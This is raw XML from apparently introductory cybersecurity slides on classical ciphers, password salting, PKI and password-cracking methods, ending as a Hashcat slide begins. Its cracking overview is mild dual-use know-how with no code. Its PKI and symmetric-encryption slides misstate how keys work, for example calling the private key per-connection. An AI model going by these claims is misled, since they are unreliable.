                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>f1nd1ngn3m0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>farm1990M0O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are valid salted passwords. Once the salt is added, we can then hash it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260009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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1661993"/>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Encryption Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shift Ciphers (Caesar Cipher)</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Two parties determine a number between 1-25, and shift the letters that number of spaces in the alphabet. The shift number serves as the key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 4" descr="Image result for shift cipher">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B79DCD4-0ABE-48C8-8E04-216DE577C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882" y="3099370"/>
            <a:ext cx="7756236" cy="327054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823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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2000548"/>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Encryption Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Substitution Ciphers</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These ciphers replace plaintext with cipher text using an algorithm that is a fixed system. The key is the document that shows the fixed system, which can be used to reverse engineer the encryption.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23554" name="Picture 2" descr="Image result for substitution cipher">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D783AA7-9727-4220-BF5E-5AD26C1D4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274" y="3371273"/>
            <a:ext cx="6502400" cy="2743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04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2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ethical versus Legal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Legal is following the law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ethics are doing the “right thing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…not always the same thing!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164562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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2000548"/>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Encryption Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transposition Ciphers</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This algorithm uses a set of rules, which serve as the key, to change the order of the text into a different permutations that can then be encrypted. Common examples are Rail Fence and Route ciphers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2" descr="Image result for rail fence cipher">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1631A7-66FC-4B04-BBD6-583573573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203" y="3429000"/>
            <a:ext cx="8831593" cy="26681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3107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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2000548"/>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Encryption Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Polyalphabetic Ciphers</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These are a type of substitution cipher that use multiple alphabets to further complicate unauthorized decryption of the ciphertext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25604" name="Picture 4" descr="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9a/Vigen%C3%A8re_square_shading.svg/1024px-Vigen%C3%A8re_square_shading.svg.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC1B735-216C-4567-B15C-5A0BBB797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300" y="2974904"/>
            <a:ext cx="3699400" cy="3699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397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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1692771"/>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Encryption Algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nomenclator ciphers</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 type of substitution cipher that replaces common plaintext words with symbols to try and throw off a specific form of cryptanalysis.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2" descr="Image result for nomenclature cipher example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4981854E-422B-4B95-B8E4-7C002CA6A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941" y="3003223"/>
            <a:ext cx="8128227" cy="35778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1279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Public Key Infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3323987"/>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Public Key Infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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PKI is the framework of encryption and cybersecurity that protects communications between the server (your website) and the client (the users).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Uses two different cryptographic keys: a public key and a private key.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Public key - available to any user that connects with the website.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Private key - a unique key generated when a connection is made, and it is kept secret.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When communicating, the client uses the public key to encrypt and decrypt, and the server uses the private key. This protects the user’s information from theft or tampering.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160781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Public Key Infrastructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4524315"/>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Modern Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Asymmetric Encryption</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One key encrypts, the other key decrypts.</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The encryption only goes one way.</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This is the concept that forms the foundation for PKI (public key infrastructure), which is the trust model that is the basis for SSL/TLS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Symmetric Encryption</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This is closer to a form of private key encryption.</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Each party has its own key that can both encrypt and decrypt.</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After the asymmetric encryption that occurs in the SSL handshake, the browser and server communicate using the symmetric session key that is passed along.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115868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 Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4893647"/>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How to crack a password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Guess (multiple attempts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"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Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dictionary attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uses permutations of dictionary words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple, blueberry, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>justinbieber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, s3cr3t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="2400"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Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Systematically checking all possible passwords/passphrases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AAAAA, AAAAB, AAAAC, AAAAD … s2cr3t, s3cr3t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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endParaRPr lang="en-US" sz="2400"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194211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 Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lookup Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Hashes are pre-computed and stored with their corresponding password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rainbow Tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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 type of lookup table that are used in recovering passwords up to a certain length consisting of a limited set of characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fingerprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Breaks down passwords into ”fingerprints” – single and multi-character combinations that a user might choose. (“d”, “o”, “g”, “do”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>og</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”, “dog”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PRINCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Probability Infinite Chained Elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Uses an algorithm to try the most likely password candidates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">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Creates chains of words using a single dictionary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1022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 Cracking - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CD6B00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1"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800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Well-known password cracker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
